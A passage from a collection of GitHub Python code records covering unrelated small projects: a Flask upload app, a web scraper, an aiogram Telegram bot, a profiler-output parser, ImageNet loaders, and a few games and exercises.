in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n mode = request.form['mode']\n print(request.form)\n file = request.files['file']\n \n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join('app', app.config['UPLOAD_FOLDER'], filename))\n\n \n return redirect(url_for('result',\n filename=filename, mode=mode))\n \n return render_template('index.html')\n\n@app.route('/result/')\ndef result(filename, mode=None):\n mode = request.args.get('mode')\n print(mode)\n if mode == \"bench\":\n print('bench')\n result_path = sr_net.get_bench_image('./app/upload/', filename, 4)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_bench_image('./app/upload/','fail.png',4)\n elif mode == '4':\n print(4)\n result_path = sr_net.get_sr_image('./app/upload/', filename, 4)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_sr_image('./app/upload/','fail.png',4)\n elif mode == '2j':\n print(4)\n result_path = sr_net.get_sr_image_jpeg('./app/upload/', filename, 4)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_sr_image_jpeg('./app/upload/','fail.png',4)\n elif mode == '2':\n print(2)\n result_path = sr_net.get_sr_image('./app/upload/', filename, 2)\n if result_path[-1] == 'fail':\n result_path = sr_net.get_sr_image('./app/upload/','fail.png',2)\n else :\n result_path = ['lr_4x_'+filename, 'bicubic_4x_'+filename, 'sr_4x_'+filename]\n return render_template('result.html',filename = [filename] + result_path)\n\n@app.route('/upload/')\ndef upload(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n\n@app.errorhandler(413)\ndef error413(e):\n return \"File is too big\", 
413","repo_name":"nonbanana/super_resolution_demo","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12844285073","text":"from django.shortcuts import render\nfrom django.views import generic\nfrom projects.models import Project\n\n\nclass ProjectList(generic.ListView):\n model = Project\n template_name = 'view_projects.html'\n context_object_name = \"projects\"\n\n def get_context_data(self, **kwargs):\n context = super(ProjectList, self).get_context_data(**kwargs)\n\n context['myVariableOfContext'] = 0\n\n return context\n","repo_name":"fxleblanc/SiteCedille2.0","sub_path":"django/cedille/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24001541410","text":"import requests\nfrom bs4 import BeautifulSoup\n# import lxml\nimport re\n# import os\n# import smtplib\nimport datetime\nimport json\n\nJSON_FILE = \"amazon_google_pixel_5g.json\"\nAMAZON_URL = \"https://www.amazon.com/Google-Pixel-5G-Factory-Unlocked/dp/B09DV93S9K/ref=sr_1_4?\" \\\n \"keywords=google+pixel&qid=1645364495&s=electronics&sprefix=goo%2Celectronics-intl-ship%2C188&sr=1-4\"\nmy_headers = {\n \"Accept-Language\": \"sk,cs;q=0.8,en;q=0.6,en-US;q=0.4,pl;q=0.2\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/98.0.4758.102 Safari/537.36\",\n # \"cookie\": \"i18n-prefs=EUR\",\n}\nmy_cookies = {\n \"i18n-prefs\": \"EUR\",\n \"sp-cdn\": \"L5Z9:SK\",\n}\n\nresponse = requests.get(url=AMAZON_URL, headers=my_headers, cookies=my_cookies)\nresponse.raise_for_status()\namazon_page = response.text\nsoup = BeautifulSoup(amazon_page, \"html.parser\")\n\n# print(soup.prettify())\nAMAZON_PRICE_LIMIT = 55 # real price 53 - 54 USD\namazon_product_name = 
soup.select_one(\"span#productTitle\").getText().strip()\nprint(amazon_product_name)\namazon_product_price = soup.select_one(\n \"div#corePrice_desktop span.apexPriceToPay span.a-offscreen\"\n).getText()\nprint(type(amazon_product_price), \" / \", amazon_product_price)\namazon_prod_pr_str = re.sub(r\"[^\\d,.]\", '', amazon_product_price)\nprint(amazon_prod_pr_str)\namazon_product_price_float = float(amazon_prod_pr_str.replace(\",\", \".\"))\nprint(amazon_product_price_float)\nprint(\"...\")\n\nrecord_datetime = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\ndata_dict = {\n \"product_name\": amazon_product_name,\n \"product_link\": AMAZON_URL,\n \"min_price\": \"\",\n \"price_history\": [(str(record_datetime), amazon_product_price_float)],\n}\n\ntry:\n with open(JSON_FILE, mode=\"r\") as file:\n # Reading all old data from json file, if exists\n data = json.load(file)\n if amazon_product_price_float < data['min_price']:\n data['min_price'] = amazon_product_price_float\n data['price_history'].append(data_dict['price_history'][0])\n # print(\"data: \", data)\nexcept FileNotFoundError:\n # print(\"File not found.\")\n with open(JSON_FILE, mode=\"w\") as file:\n data_dict['min_price'] = amazon_product_price_float\n json.dump(data_dict, file, indent=4)\nelse:\n with open(JSON_FILE, mode=\"w\") as file:\n json.dump(data, file, indent=4)\n","repo_name":"zwieratko/python-quick-notes","sub_path":"bs4_with_headers_cookies.py","file_name":"bs4_with_headers_cookies.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12314537824","text":"import sys\n\nimport numpy as np\nfrom keras.models import load_model\nimport keras\n\n\nclass PedestrianCounter:\n def __init__(self):\n self.model = load_model('model.h5', custom_objects={'keras': keras})\n self.buffer = np.zeros((1, 100, 24, 32, 1))\n self.count = 0.0\n self.i = 0\n\n def update(self, frame):\n expanded = 
np.expand_dims(frame, axis=2)\n self.buffer[0, 1:] = self.buffer[0, :-1]\n self.buffer[0, 1] = expanded\n\n self.process(self.buffer)\n\n self.i += 1\n\n def process(self, buffer):\n out = np.argmax(self.model.predict(buffer)[0])\n self.count += out / 100.0\n print(self.count, out)\n","repo_name":"franz-bender-spreewunder/Quirinius","sub_path":"Quirinius/PedestrianCounter.py","file_name":"PedestrianCounter.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11934669544","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFaça um programa que calcule as raízes de uma equação do segundo grau, na\nforma ax2 + bx + c. O programa deverá pedir os valores de a, b e c e fazer as\nconsistências, informando ao usuário nas seguintes situações:\na. Se o usuário informar o valor de A igual a zero, a equação não é\ndo segundo grau e o programa não deve pedir os demais valores,\nsendo encerrado;\nb. Se o delta calculado for negativo, a equação não possui raizes\nreais. Informe ao usuário e encerre o programa;\nc. Se o delta calculado for igual a zero a equação possui apenas uma\nraiz real; informe-a ao usuário;\nd. Se o delta for positivo, a equação possui duas raizes reais;\ninforme-as ao usuário;\n\"\"\"\n\nprint(\"=====================================================\")\n\nimport math\n\na = int(input(\"Digite o primeiro numero: \"))\nif a == 0:\n\tprint(\"A equação nao e do segundo grau.\")\nelse:\n\tb = int(input(\"Digite o segundo numero: \"))\n\tc = int(input(\"Digite o terceiro numero: \"))\n\tdelta = (math.pow(b,2) - (4*a*c))\n\tif delta < 0:\n\t\tprint(\"A equacao nao possui raizes reais.\")\n\tif delta == 0:\n\t\traiz = ((-1) * b + math.sqrt(delta) / (2 * a))\n\t\tprint(\"A equacao possui apenas uma raiz real. 
%.2f\" % raiz)\n\tif delta > 0:\n\t\traiz1 = ((-1) * b + math.sqrt(delta) / (2 * a))\n\t\traiz2 = ((-1) * b - math.sqrt(delta) / (2 * a))\n\t\tprint(\"A equacao possui duas raizes reais.\")\n\t\tprint(\"Raiz 1: %.2f\" % raiz1)\n\t\tprint(\"Raiz 2: %.2f\" % raiz2)\n\nprint(\"=====================================================\")\n","repo_name":"WalterBrito/Python","sub_path":"EstruturaDecisao/ex2.17.py","file_name":"ex2.17.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19995940419","text":"#!/usr/bin/env python3\nimport datetime\nimport logging\nimport os\nimport sys\n \nimport ncscli.batchRunner as batchRunner\n \nclass pythonFrameProcessor(batchRunner.frameProcessor):\n '''defines details for using python in a simple batch job'''\n workerScriptPath = 'helloLocation.py'\n \n def frameOutFileName( self, frameNum ):\n return 'frame_%d.out' % (frameNum)\n \n def frameCmd( self, frameNum ):\n pythonFileName = os.path.basename( self.workerScriptPath )\n cmd = 'python3 %s %d | tee %s' % \\\n (pythonFileName, frameNum, self.frameOutFileName(frameNum) )\n return cmd\n \nif __name__ == \"__main__\":\n # configure logger\n logging.basicConfig()\n dateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )\n outDataDirPath = 'data/location_' + dateTimeTag\n \n rc = batchRunner.runBatch(\n frameProcessor = pythonFrameProcessor(),\n pushDeviceLocs=True,\n commonInFilePath = pythonFrameProcessor.workerScriptPath,\n authToken = os.getenv( 'NCS_AUTH_TOKEN' ) or 'YourAuthTokenHere',\n timeLimit = 1200,\n instTimeLimit = 300,\n frameTimeLimit = 30,\n filter = '{\"dpr\": \">=24\"}',\n outDataDir = outDataDirPath,\n encryptFiles = False,\n startFrame = 1,\n endFrame = 10\n )\n sys.exit( rc 
)\n","repo_name":"neocortix/ncscli","sub_path":"examples/batchMode/runBatchLocation.py","file_name":"runBatchLocation.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"21975686346","text":"#!/usr/bin/env python\nimport shlex\n\nfrom snixCore import execute, execute_in_dir_and_revert, abort\nimport snixLogger\n\nlogger = snixLogger.SnixLogger.logger()\n\n\nclass Repo:\n \"\"\"Represents a repository.\"\"\"\n\n def __init__(self, context):\n if not type(context) is dict:\n abort('Cannot clone a repo without the configuration.')\n self._context = context\n\n def clone(self):\n with execute_in_dir_and_revert(self._context['snix_root']):\n msg = \"Cloning {0}...\".format(self._context['repo_location'])\n cmd, use_shell = self._build_cmd()\n logger.info(msg + cmd)\n ret = execute(shlex.split(cmd), use_shell)\n logger.info(msg + 'StatusCode:' + str(ret))\n logger.info(msg + 'Done!')\n\n def _build_cmd(self):\n return \"git clone --progress \" + self._context['repo_location'], False\n","repo_name":"nishantkakar/snix","sub_path":"repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"792684092","text":"# import csv\nimport os\nimport CSV1\nimport pytest\n\n\ndef test_if_input_for_list_is_None():\n empty_list = None\n with pytest.raises(ValueError):\n assert CSV1.CSV_list(empty_list, \"FC-List\")\n\n\ndef test_exception_if_list_is_empty():\n empty_list = []\n with pytest.raises(ValueError):\n assert CSV1.CSV_list(empty_list, \"FC-List\")\n\n\ndef test_exception_when_Filename_is_above_80_characters():\n Filename = \"This Filename is way to long so it hopefully spits out an error eventually, hopefully, if at all or maybe not.\"\n with pytest.raises(ValueError):\n assert CSV1.CSV_list([\"Dr Suna\", \"Freya Luna\"], Filename)\n\n\ndef 
test_that_list_is_written_to_a_file():\n Filename = CSV1.CSV_list([\"Dr Suna\", \"Ichiro\", \"Freya Luna\"], \"FC-List\")\n File = open(Filename, \"r\")\n Result = File.read()\n File.close()\n os.remove(str(Filename))\n assert Result == \"Dr Suna, Ichiro, Freya Luna\"\n","repo_name":"Zoracs/Phase-1","sub_path":"CSV_test.py","file_name":"CSV_test.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3844249762","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.special import factorial\n\n# Hypothesis space\nx = np.arange(0, 30)\n\n# Three poisson distributions\np1 = 3.0**x * np.exp(-3.0) / factorial(x)\n#p1 = p1/p1.sum()\n\np2 = 6.0**x * np.exp(-6.0) / factorial(x)\n#p2 = p2/p2.sum()\n\np3 = 15.0**x * np.exp(-15.0) / factorial(x)\n#p3 = p3/p3.sum()\n\n\n# Set fonts\nplt.rc(\"font\", size=16, family=\"Serif\", serif=\"Computer Sans\")\nplt.rc(\"text\", usetex=True)\n\n# Make the plot\nplt.bar(x, p1, alpha=0.4, label=r\"$\\lambda = 3$\")\nplt.bar(x, p2, alpha=0.4, label=r\"$\\lambda = 6$\")\nplt.bar(x, p3, alpha=0.4, label=r\"$\\lambda = 15$\")\nplt.xlabel(r\"$x$\")\nplt.ylabel(\"Probability\")\nplt.legend(loc=\"upper right\")\nplt.savefig(\"poisson.pdf\")\n\n","repo_name":"eggplantbren/Madrid","sub_path":"slides/poisson.py","file_name":"poisson.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12735958771","text":"import cProfile\nimport os\nimport pstats\nimport re\nimport sys\nimport threading\nfrom typing import List, NamedTuple\n\n\nclass FunctionStatistics(NamedTuple):\n name: str\n num_calls: int\n total: int\n cumulative: int\n\n def __repr__(self) -> str:\n return f'{self.name} ({self.num_calls} calls): {self.total} ns / {self.cumulative} ns'\n\n\nclass StdoutCapturer:\n def __init__(self):\n self.captured_stdout = ''\n\n def 
__enter__(self):\n self.stdout_fileno = sys.stdout.fileno()\n self.original_stdout = os.dup(self.stdout_fileno)\n\n # Create a new pipe\n self.stdout_pipe = os.pipe()\n\n # Replace stdout with the pipe's input\n os.dup2(self.stdout_pipe[1], self.stdout_fileno)\n os.close(self.stdout_pipe[1])\n\n def drain_pipe():\n while True:\n data = os.read(self.stdout_pipe[0], 1024)\n if not data:\n break\n self.captured_stdout += data.decode()\n\n self.pipe_reader = threading.Thread(target=drain_pipe)\n self.pipe_reader.start()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # Close the input of the pipe to make the reader thread exit\n os.close(self.stdout_fileno)\n self.pipe_reader.join()\n\n # Clean up the pipe and restore the original stdout\n os.close(self.stdout_pipe[0])\n os.dup2(self.original_stdout, self.stdout_fileno)\n os.close(self.original_stdout)\n\n\ndef capture_stats_output(profile: cProfile.Profile) -> str:\n \"Captures the cProfile statistics output to a string.\"\n\n stats = pstats.Stats(profile)\n stats.sort_stats(pstats.SortKey.STDNAME)\n\n capture = StdoutCapturer()\n with capture:\n stats.print_stats()\n\n return capture.captured_stdout\n\n\ndef parse(output: str) -> List[FunctionStatistics]:\n \"Parses the cProfile output.\"\n\n lines = output.splitlines()\n stripped = [l.strip() for l in lines]\n non_empty = [l for l in stripped if len(l) != 0]\n\n assert 'Ordered by: standard name' == non_empty[1]\n\n # Check that the column names match our expected format\n header = non_empty[2]\n check_header(header)\n\n special_method_name_pattern = re.compile(r'\\{(.+)\\}')\n fn_name_pattern = re.compile(r'(\\(.+\\))')\n\n stats = []\n\n for line in non_empty[3:]:\n elems = line.split()\n\n if '/' in elems[0]:\n num_calls = int(elems[0].split('/')[1])\n else:\n num_calls = int(elems[0])\n total_time = float(elems[1])\n total_time_per_call = float(elems[2])\n cumulative_time = float(elems[3])\n cumulative_time_per_call = float(elems[4])\n\n fn_name = None\n 
matches = special_method_name_pattern.search(line)\n if matches:\n fn_name = matches.group(0)\n else:\n matches = fn_name_pattern.search(elems[-1])\n if matches:\n fn_name = matches.group(0)\n else:\n raise Exception(\n 'Could not parse function name from cProfile output')\n\n # Remove the parantheses/brackets from the function/method name\n fn_name = fn_name[1:-1]\n\n total_time_ns = int(total_time * 1_000_000_000)\n cumulative_time_ns = int(cumulative_time * 1_000_000_000)\n\n stats.append(FunctionStatistics(\n fn_name, num_calls, total_time_ns, cumulative_time_ns))\n\n return stats\n\n\ndef check_header(header: str):\n \"Checks the give stats header to match the supported format.\"\n columns = header.split()\n\n assert 'ncalls' == columns[0]\n assert 'tottime' == columns[1]\n assert 'cumtime' == columns[3]\n","repo_name":"GabrielMajeri/adaptive-profiler","sub_path":"util/cprofile.py","file_name":"cprofile.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24156972302","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import CallbackQuery\nfrom apscheduler_di import ContextSchedulerDecorator\n\nfrom tgbot.db import update_notifications_in_db\nfrom tgbot.filters import BackMenuFilter, EditNoteFilter, ChooseNotificationFilter, ApproveDataFilter\nfrom tgbot.keyboards import add_notification_keyboard, approving_keyboard, after_changes_keyboard\nfrom tgbot.misc.notification_views import long_notification\nfrom tgbot.misc.states import EditNotificationStates, EditPersonStates\nfrom tgbot.middlewares.language_middleware import _\nfrom tgbot.scheduler import get_id_by_name, modify_notification\n\n\n# Хэндлер для меню \"Изменить уведомление\"\nasync def edit_notification_handler(call: CallbackQuery, state: FSMContext):\n text = _(\"Выберите когда напоминать Вам о Дне рождения {name}:\")\n\n await 
call.answer(cache_time=60)\n data = await state.get_data()\n name = data.get(\"name\")\n await call.message.answer(text=text.format(name=name), reply_markup=add_notification_keyboard())\n await EditNotificationStates.waiting_for_notification_instead.set()\n\n\n# Хэндлер для меню \"Подтвердите введенные данные\"\nasync def check_before_edit_notif_handler(call: CallbackQuery, state: FSMContext):\n text = _(\"Теперь бот будет напоминать Вам о день рождении {name}:\\n\\n\"\n \"{notification}\\n\"\n \"\\n\"\n \"Нажмите кнопку 'Все верно', чтобы сохранить изменения.\")\n\n await call.answer(cache_time=60)\n data = await state.get_data()\n name = data.get(\"name\")\n long_note = await long_notification(call.data)\n await state.update_data(notification=call.data)\n await call.message.answer(text.format(name=name, notification=long_note), reply_markup=approving_keyboard())\n await EditNotificationStates.waiting_for_notification_approve.set()\n\n\n# Хэндлер для завершения редактирования уведомлений с сохранением изменений в БД\nasync def notif_editing_complete_handler(call: CallbackQuery, state: FSMContext, scheduler: ContextSchedulerDecorator):\n text = _(\"Изменения успешно внесены\")\n\n await call.answer(cache_time=60)\n data = await state.get_data()\n name = data.get(\"name\")\n year = data.get(\"year\")\n month = data.get(\"month\")\n day = data.get(\"day\")\n notification = data.get(\"notification\")\n user_id = call.from_user.id\n await update_notifications_in_db(notification=notification, user_id=user_id, name=name)\n await call.message.answer(text=text, reply_markup=after_changes_keyboard())\n onday_id, before_id = await get_id_by_name(scheduler=scheduler, user_id=user_id, name=name)\n await modify_notification(scheduler=scheduler, notification=notification, user_id=user_id, name=name,\n year=year, month=month, day=day, onday_id=onday_id, before_id=before_id)\n await state.finish()\n\n\ndef reg_edit_notification_handlers(dp: Dispatcher):\n # Регистрация хендлеров 
многоуровнего меню \"Изменить уведомление\"\n dp.register_callback_query_handler(edit_notification_handler, EditNoteFilter(),\n state=EditPersonStates.waiting_for_what_to_edit)\n dp.register_callback_query_handler(check_before_edit_notif_handler, ChooseNotificationFilter(),\n state=EditNotificationStates.waiting_for_notification_instead)\n dp.register_callback_query_handler(notif_editing_complete_handler, ApproveDataFilter(),\n state=EditNotificationStates.waiting_for_notification_approve)\n\n # Регистрация хэндлеров кнопки \"Назад\" в ветке \"Изменить уведомление\"\n dp.register_callback_query_handler(edit_notification_handler, BackMenuFilter(),\n state=EditNotificationStates.waiting_for_notification_approve)\n","repo_name":"MaximAntsiferov/Birthday-Reminder-Telegram-bot","sub_path":"tgbot/handlers/inside_the_list/inside_editing/edit_notification_handlers.py","file_name":"edit_notification_handlers.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"22137530198","text":"import math\r\ndef solve():\r\n n, k = map(int, input().split())\r\n p = 1\r\n ans = 0\r\n mod = 1000000007\r\n \r\n for i in range(32):\r\n if k & (1 << i):\r\n ans = (ans + p) % mod \r\n p *= n\r\n p %= mod\r\n print(ans)\r\n\r\nfor _ in range(int(input())):\r\n solve()\r\n\r\n ","repo_name":"mlabeeb03/codeforces","sub_path":"Special Numbers.py","file_name":"Special Numbers.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12438633071","text":"import sys\n\ninput = sys.stdin.readline\nx, y = map(str, input().split())\n\ndef rev(i):\n i = i[::-1]\n i = int(i)\n return i 
\n\nprint(rev(str(rev(x)+rev(y))))\n","repo_name":"lyong4432/practice","sub_path":"#1357.py","file_name":"#1357.py","file_ext":"py","file_size_in_byte":162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"374921879","text":"\"\"\"prepare CIFAR and SVHN\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\n\r\nimport sys\r\nimport os\r\nimport glob\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nfrom torch.utils.data import Dataset\r\nfrom PIL import Image\r\nimport numpy as np\r\nfrom autoaugment import ImageNetPolicy\r\n\r\n\r\ncrop_size = 32\r\npadding = 4\r\n\r\n\r\nclass ImageNet_For_Search(Dataset):\r\n def __init__(self, root, transforms_=None, num_class=100):\r\n self.transform = transforms_\r\n self.files = []\r\n self.labels = []\r\n\r\n # dir_list = np.random.choice(os.listdir(os.path.join(root, mode)), num_class, replace=False)\r\n dir_list = os.listdir(root)[:num_class]\r\n for label, dirname in enumerate(dir_list):\r\n for fname in os.listdir(os.path.join(root, dirname)):\r\n assert 'JPEG' in fname or 'jpg' in fname or 'png' in fname\r\n self.files.append(os.path.join(root, dirname, fname))\r\n self.labels.append(label)\r\n\r\n data_list = list(zip(self.files, self.labels))\r\n np.random.shuffle(data_list)\r\n self.files, self.labels = zip(*data_list)\r\n\r\n self.files = list(self.files)\r\n self.labels = list(self.labels)\r\n\r\n\r\n def __getitem__(self, index):\r\n img = self.transform(Image.open(self.files[index % len(self.files)]).convert('RGB'))\r\n label = self.labels[index % len(self.files)]\r\n \r\n return img, label\r\n\r\n def __len__(self):\r\n # return max(len(self.files), len(self.files_B))\r\n return len(self.files)\r\n\r\n\r\ndef prepare_train_data_for_search(dataset='imagenet', datadir='/home/yf22/dataset', num_class=100):\r\n if 'imagenet' in dataset:\r\n train_dataset = ImageNet_For_Search(\r\n datadir,\r\n 
transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]), \r\n num_class=num_class)\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_test_data_for_search(dataset='imagenet', datadir='/home/yf22/dataset', num_class=100):\r\n if 'imagenet' in dataset:\r\n train_dataset = ImageNet_For_Search(\r\n datadir,\r\n transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]), \r\n num_class=num_class)\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_train_data_autoaugment(dataset='imagenet', datadir='/home/yf22/dataset'):\r\n if 'imagenet' in dataset:\r\n train_dataset = torchvision.datasets.ImageFolder(\r\n datadir,\r\n transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n ImageNetPolicy(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]))\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_train_data(dataset='imagenet', datadir='/home/yf22/dataset'):\r\n if 'imagenet' in dataset:\r\n train_dataset = torchvision.datasets.ImageFolder(\r\n datadir,\r\n transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]))\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_test_data(dataset='imagenet', datadir='/home/yf22/dataset'):\r\n\r\n if 'imagenet' in dataset:\r\n test_dataset = torchvision.datasets.ImageFolder(datadir, transforms.Compose([\r\n 
transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]))\r\n\r\n else:\r\n test_dataset = None\r\n\r\n return test_dataset\r\n","repo_name":"GATECH-EIC/Auto-NBA","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"3385914031","text":"from turtle import Turtle\n\nSEG_SIZE = 20\nMOVE_DISTANCE = 20\nUP = 90\nDOWN = 270\nLEFT = 180\nRIGHT = 0\n\n\nclass Snake:\n def __init__(self, size):\n self.size = size\n self.segments = []\n self.create_snake()\n self.head = self.segments[0]\n\n def create_snake(self):\n for i in range(self.size):\n seg = self.new_seg()\n seg.goto(i * -SEG_SIZE, 0)\n self.segments.append(seg)\n\n def new_seg(self):\n seg = Turtle()\n seg.shape(\"square\")\n seg.color(\"white\")\n seg.penup()\n return seg\n\n def eat(self):\n seg = self.new_seg()\n last_one_pos = self.segments[-1].pos()\n seg.goto(last_one_pos)\n self.segments.append(seg)\n\n def move(self):\n for i in range(len(self.segments) - 1, 0, -1):\n self.segments[i].setpos(self.segments[i - 1].pos())\n self.segments[0].fd(MOVE_DISTANCE)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.setheading(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.setheading(DOWN)\n\n def left(self):\n if self.head.heading() != RIGHT:\n self.head.setheading(LEFT)\n\n def right(self):\n if self.head.heading() != LEFT:\n self.head.setheading(RIGHT)\n","repo_name":"ax2024/python100","sub_path":"d20/snake_game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7557111419","text":"from math import floor, ceil\nfrom copy import deepcopy\n\n\nclass SnailNumber:\n def __init__(self, left, 
right, depth=0):\n self.left = left\n self.right = right\n self.depth = depth\n self.parent = None\n\n def find_explosion(self):\n if isinstance(self.left, SnailNumber):\n if self.left.depth < 4:\n explosion = self.left.find_explosion()\n if explosion is not None:\n return explosion\n else:\n return self.left\n\n if isinstance(self.right, SnailNumber):\n if self.right.depth < 4:\n explosion = self.right.find_explosion()\n if explosion is not None:\n return explosion\n else:\n return self.right\n return None\n\n def find_split(self):\n if isinstance(self.left, int):\n if self.left >= 10:\n return self\n else:\n split = self.left.find_split()\n if split is not None:\n return split\n\n if isinstance(self.right, int):\n if self.right >= 10:\n return self\n else:\n split = self.right.find_split()\n if split is not None:\n return split\n\n return None\n\n def update_left_neighbour(self, value):\n if self.parent is not None:\n if self is self.parent.right:\n if isinstance(self.parent.left, SnailNumber):\n to_update = self.parent.left\n while isinstance(to_update.right, SnailNumber):\n to_update = to_update.right\n to_update.right += value\n else:\n self.parent.left += value\n else:\n to_update = self\n while to_update == to_update.parent.left:\n to_update = to_update.parent\n if to_update.parent is None:\n return\n to_update = to_update.parent\n if isinstance(to_update.left, SnailNumber):\n to_update = to_update.left\n while isinstance(to_update.right, SnailNumber):\n to_update = to_update.right\n to_update.right += value\n else:\n to_update.left += value\n\n def update_right_neighbour(self, value):\n if self.parent is not None:\n if self is self.parent.left:\n if isinstance(self.parent.right, SnailNumber):\n to_update = self.parent.right\n while isinstance(to_update.left, SnailNumber):\n to_update = to_update.left\n to_update.left += value\n else:\n self.parent.right += value\n else:\n to_update = self\n while to_update == to_update.parent.right:\n to_update = 
to_update.parent\n if to_update.parent is None:\n return\n to_update = to_update.parent\n if isinstance(to_update.right, SnailNumber):\n to_update = to_update.right\n while isinstance(to_update.left, SnailNumber):\n to_update = to_update.left\n to_update.left += value\n else:\n to_update.right += value\n\n def update_depth(self):\n self.depth += 1\n if isinstance(self.left, SnailNumber):\n self.left.update_depth()\n if isinstance(self.right, SnailNumber):\n self.right.update_depth()\n\n def magnitude(self):\n left = 0\n right = 0\n if isinstance(self.left, SnailNumber):\n left += 3 * self.left.magnitude()\n else:\n left += 3 * self.left\n if isinstance(self.right, SnailNumber):\n right += 2 * self.right.magnitude()\n else:\n right += 2 * self.right\n return left + right\n\n\ndef parse_snail_number(line, depth=0):\n # if line starts with number, we have a value\n if line[0] != '[':\n return int(line)\n else:\n # find split between left and right part of snail number\n stack = []\n last_comma = -1\n for i, char in enumerate(line):\n if char == ',':\n stack.append(i)\n elif char == ']':\n last_comma = stack.pop()\n snail_number = SnailNumber(parse_snail_number(line[1:last_comma], depth + 1),\n parse_snail_number(line[last_comma + 1:-1], depth + 1))\n\n if isinstance(snail_number.left, SnailNumber):\n snail_number.left.parent = snail_number\n if isinstance(snail_number.right, SnailNumber):\n snail_number.right.parent = snail_number\n snail_number.depth = depth\n return snail_number\n\n\ndef read_input():\n snail_numbers = []\n with open(\"input18.txt\") as f:\n for line in f:\n snail_numbers.append(parse_snail_number(line[:-1]))\n return snail_numbers\n\n\ndef explode(to_explode):\n to_explode.update_left_neighbour(to_explode.left)\n to_explode.update_right_neighbour(to_explode.right)\n\n if to_explode == to_explode.parent.left:\n to_explode.parent.left = 0\n else:\n to_explode.parent.right = 0\n\n\ndef split(to_split):\n if isinstance(to_split.left, int) and 
